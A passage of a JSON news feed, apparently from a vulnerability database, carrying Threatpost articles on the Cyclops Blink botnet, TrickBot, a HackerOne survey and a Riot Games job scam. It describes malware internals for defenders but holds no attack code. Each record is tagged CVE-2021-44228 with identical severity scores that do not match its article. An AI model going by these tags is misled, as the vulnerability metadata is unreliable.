risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. \u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. \u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T15:47:11", "description": "Enterprises are putting greater stock in cybersecurity, but outdated \u201csecurity by obscurity\u201d is still prevailing as companies wrestle with security awareness and shy away from bug-bounty programs.\n\nThat\u2019s according to new survey data from HackerOne, which found that a full 65 percent of organizations surveyed claimed that they \u201cwant to be seen as infallible.\u201d However, just as many \u2013 64 percent \u2013 said they practice a culture of security through obscurity, where secrecy is used as the primary method of protecting sensitive systems and assets.\n\n## Struggling with Security Awareness\n\nWhen it comes to what\u2019s actually happening on the ground inside organizations, 57 percent of respondents in the report \u2013 \u201cThe Corporate Security Trap: Shifting Security Culture from Secrecy to Transparency\u201d \u2013 said that they struggle to create a culture of cybersecurity, and only 26 percent are \u201cvery confident\u201d that staff are following security practices.\n\nWorse, only 12 percent of departments outside of security and IT make cyber-awareness and training a core focus, according to the survey.\n\nAnd that\u2019s translating to trouble: About 63 percent said they\u2019ve had a security breach as a result of staff sidestepping security measures.\n\nSome of the issues come from the top: Only 29 percent of boards are \u201cdeeply involved\u201d in cybersecurity strategy; and 65 percent said that the idea that security slows innovation is telegraphed to them.\n\nMeanwhile, 63 percent of organizations said that they believe that cybersecurity is \u201cas important as cost when choosing a supplier,\u201d and 62 percent of organizations \u201cwould take their business elsewhere if a supplier suffered a data breach.\u201d\n\n## The Problem with Secrecy\n\nThus, perhaps it\u2019s no wonder that 38percent of respondents agreed that their organizations \u201caren\u2019t open about their cybersecurity practices.\u201d\n\nBut according to the authors of the report, this kind of approach is harmful, because \u201cby not admitting weaknesses and asking for help fixing them, organizations risk far more significant damage to their brand should a vulnerability be exploited.\u201d\n\n\u201cSunshine is the best medicine,\u201d wrote HackerOne CTO and co-founder Alex Rice, in the report. \u201cShining a light on the work to be done is the only way to win. We must stop asking security teams to toil away in obscurity.\u201d\n\nThe report suggested a few general changes organizations can make, like reporting breaches to stakeholders and publishing reports outlining security measures that companies have in place. Another practical fix to a closed security culture would be putting into place Vulnerability Disclosure Policies (VDPs), bug-bounty programs and regular pentests that get third-party researchers involved.\n\nHowever, third-party vulnerability reporting comes with its own complications.\n\n## The Controversy Around Bug Bounties\n\nMajor corporations like [Google](<https://threatpost.com/google-product-abuse-bug-bounties/158940/>) and [Intel](<https://threatpost.com/intel-expands-bug-bounty-program-post-spectre-and-meltdown/129980/>) pay out thousands of dollars at a time \u2013 even [millions of dollars](<https://threatpost.com/google-record-high-bug-bounty-payouts/152354/>) every year \u2013 in bug-bounty programs. With the financial incentive to do so, outside researchers and friendly hackers help companies find zero-day vulnerabilities early, before the bad guys do.\n\nHowever, this new survey data shows that not everyone is on board, suggesting that not all security professionals are open to outside scrutiny. A full 67 percent of respondents said that they \u201cwould rather accept software vulnerabilities than work with hackers.\u201d\n\nAnd the hesitancy goes both ways. Ethical hackers are often dissuaded from reporting vulnerabilities to vendors, because they\u2019re so often [ignored or outright attacked](<https://threatpost.com/the-vulnerability-disclosure-process-still-broken/137180/>) for doing so. In October, for example, the governor of Missouri launched a [criminal investigation against a journalist](<https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/>) who reported that the state\u2019s website was exposing hundreds of thousands of social security numbers on the web.\n\nIt\u2019s no surprise, then, that 50 percent of hackers \u201chave not disclosed a bug because of a [previous negative experience](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) or lack of channels through which to report,\u201d according to the report.\n\n## What Organizations Can Do\n\nTo establish trust and openness in corporate cybersecurity, HackerOne suggested four core tenets for corporate security responsibility. They are:\n\n * **Encouraging industry-wide transparency to build trust and share intelligence;**\n * **Fostering a culture of industry-wide collaboration that gives everyone the tools to take control of reducing cyber-risk;**\n * **Promoting innovation by inspiring development teams to build with security in mind and bring secure products to market faster;**\n * **And holding oneself and suppliers accountable to following best practices to develop security as an easy point of differentiation.**\n\nThe stakes are high: About 53 percent of survey respondents admitted that \u201cthey have lost customers as a result of a security breach.\u201d Bottom line? The sooner organizations evolve to be more open and collaborative about security, the better off they \u2013 and the rest of us, by extension \u2013 will be.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T15:30:19", "type": "threatpost", "title": "Most Orgs Would Take Security Bugs Over Ethical Hacking Help", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:30:19", "id": "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "href": "https://threatpost.com/orgs-security-bugs-ethical-hacking-help/178862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 